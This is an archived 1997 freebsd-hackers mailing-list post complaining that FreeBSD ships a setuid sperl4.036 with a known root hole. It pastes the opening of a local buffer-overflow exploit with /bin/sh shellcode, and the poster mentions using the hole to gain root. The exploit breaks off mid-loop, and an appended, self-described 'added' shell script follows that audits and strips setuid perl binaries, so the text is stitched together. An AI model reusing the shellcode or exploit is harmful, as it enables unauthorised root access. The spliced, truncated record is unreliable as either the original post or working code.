From owner-freebsd-hackers Sun Sep 14 22:14:32 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id WAA29751 for hackers-outgoing; Sun, 14 Sep 1997 22:14:32 -0700 (PDT)
Received: from krusty.the.clown.engelska.se (nonxstnt@not.of.this.world.engelska.se [193.14.46.5]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id WAA29738 for ; Sun, 14 Sep 1997 22:14:25 -0700 (PDT)
Received: from localhost (nonxstnt@localhost) by krusty.the.clown.engelska.se (8.8.7/8.8.7) with SMTP id GAA22324 for ; Mon, 15 Sep 1997 06:30:44 +0200 (CEST)
Date: Mon, 15 Sep 1997 06:30:43 +0200 (CEST)
From: Existence is Futile
To: freebsd-hackers@FreeBSD.org
Subject: Why SPERL?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-hackers@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

Someone posted a similar message earlier, but I never saw a reply (might have been because the mailserver for this domain is Linux.. hehe). But I just want to bring it to your attention again.

Why does even the latest RELENG (that I've used) include sperl4.036, when it's a well-known way to get root? It came in handy today when some guy couldn't su because he wasn't in the wheel group and couldn't log in as root any other way (being 45 minutes away). But it's a serious security flaw! Perhaps we shouldn't include sperl4.036, or turn its suid off. I'm not sure if 4.0 is still being maintained, so I don't know if there is a newer version available, but I don't believe it acceptable to purposely leave root holes in. Of course, this may have already been fixed and I'm just blowing hot air all around, but it's an old exploit and the August RELENGs at least include it.
/************************************************************/
/* Exploit for FreeBSD sperl4.036 by OVX */
/************************************************************/
#include
#include
#include

#define BUFFER_SIZE 1400
#define OFFSET 600

char *get_esp(void) { asm("movl %esp,%eax"); }

char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
    int i;
    char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

    for(i=0+1;i
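The mitigation the post suggests, turning the setuid bit off on sperl, as an added example that is not part of the original message or of FreeBSD: a POSIX sh audit that finds setuid sperl* binaries under a tree and strips the bit. The directory layout and file names in the fixture are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original post): locate setuid perl wrappers such
# as sperl4.036 under a tree and remove the setuid bit, leaving a plain perl.
# Uses only POSIX find/chmod; the fixture paths below are assumptions.

# Print regular files named sperl* that carry the setuid bit (mode 04000).
audit_setuid_perl() {
    dir=$1
    find "$dir" -type f -name 'sperl*' -perm -4000 2>/dev/null
}

# Remove the setuid bit from every hit found by audit_setuid_perl.
# The binary stays executable, it just no longer runs as its owner (root).
strip_setuid_perl() {
    dir=$1
    audit_setuid_perl "$dir" | while IFS= read -r f; do
        chmod u-s "$f" && echo "stripped setuid: $f"
    done
}

# Constructed fixture: a throwaway tree holding a fake setuid sperl4.036 and a
# non-setuid perl, so the functions can be exercised without touching /usr/bin.
make_fixture() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/usr/bin"
    : > "$tmp/usr/bin/sperl4.036"
    : > "$tmp/usr/bin/perl"
    chmod 4755 "$tmp/usr/bin/sperl4.036"
    chmod 0755 "$tmp/usr/bin/perl"
    printf '%s\n' "$tmp"
}

# Stand-alone demo: audit the fixture, strip the bit, audit again, clean up.
demo() {
    root=$(make_fixture)
    echo "setuid perl wrappers under $root:"
    audit_setuid_perl "$root"
    strip_setuid_perl "$root"
    echo "remaining after strip: $(audit_setuid_perl "$root" | wc -l)"
    rm -rf "$root"
}

demo
```

On a real host the audit would be pointed at / (or the PREFIX of the ports tree) and the strip step run as root; the same find expression without the -name filter lists every setuid binary for a broader review.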